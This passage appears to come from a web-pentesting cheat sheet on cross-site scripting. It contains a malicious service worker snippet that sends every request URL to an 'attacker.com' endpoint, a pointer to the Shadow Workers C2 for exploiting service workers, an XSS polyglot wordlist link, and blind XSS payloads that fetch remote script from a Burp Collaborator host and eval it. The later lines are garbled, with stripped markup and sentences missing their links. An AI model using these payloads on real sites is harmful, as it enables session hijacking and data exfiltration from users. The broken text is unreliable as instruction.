e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//"; ``` There is **C2** dedicated to the **exploitation of Service Workers** called [**Shadow Workers**](https://shadow-workers.github.io/) that will be very useful to abuse these vulnerabilities. ### Polyglots {% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/xss\_polyglots.txt" %} ### Blind XSS payloads ```markup "> "> >Click Me For An Awesome Timefunction b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send(); "> ">">
">
<p title="">
Use it to bypass cookie restrictions, XSS filters and much more! More information about this technique here: .
Upload as an image a file like the following one (from ):
Find some .
Trick to download .map js files: